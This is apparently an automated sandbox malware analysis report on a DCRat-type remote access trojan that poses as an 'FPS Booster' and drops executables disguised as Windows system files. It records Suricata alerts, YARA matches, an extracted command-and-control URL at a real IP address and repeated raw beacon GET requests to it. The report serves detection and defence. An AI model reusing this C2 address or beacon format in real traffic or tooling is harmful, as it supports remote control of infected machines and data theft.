                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\e7d19d53a5ec77aafa68c9a929149b118506bb42Jump to behavior
                    Source: UNFOT5F1qt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb2e source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb1qt.PDB source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbx source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: RunPE_MemoryProtection.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPOo`C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualStudio.Threading.pdbpdbing.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbpdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: System.Core.pdbPSp source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: ?[oC:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdbJ source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualStudio.Threading.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbs source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb97` source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbXX@ source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C41000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbLLt source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: @[o.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 4x nop then dec eax5_2_00007FF887B2109D
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 4x nop then jmp 00007FF887B272C8h5_2_00007FF887B26BD2
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 4x nop then jmp 00007FF887B27A8Fh5_2_00007FF887B26BD2
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 4x nop then jmp 00007FF887B27A8Fh5_2_00007FF887B26BE5
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 4x nop then jmp 00007FF887B27A8Fh5_2_00007FF887B27560
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 4x nop then dec eax17_2_00007FF887B3109D
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 4x nop then jmp 00007FF887B372C8h17_2_00007FF887B36BE5
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 4x nop then jmp 00007FF887B37A8Fh17_2_00007FF887B36BE5
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 4x nop then jmp 00007FF887B37A8Fh17_2_00007FF887B37560
                    Source: C:\Windows\regedit\explorer.exeCode function: 4x nop then dec eax18_2_00007FF887B4109D
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 4x nop then dec eax19_2_00007FF887B5109D
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 4x nop then dec eax23_2_00007FF887B2109D
                    Source: C:\Windows\regedit\explorer.exeCode function: 4x nop then dec eax27_2_00007FF887C6109D

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49746 -> 188.120.228.203:80
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49723 -> 188.120.228.203:80
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49785 -> 188.120.228.203:80
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49767 -> 188.120.228.203:80
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49827 -> 188.120.228.203:80
                    Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49806 -> 188.120.228.203:80
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\regedit\explorer.exeNetwork Connect: 188.120.228.203 80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Windows\regedit\explorer.exe, type: DROPPED
                    Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: 188.120.228.203Connection: Keep-Alive
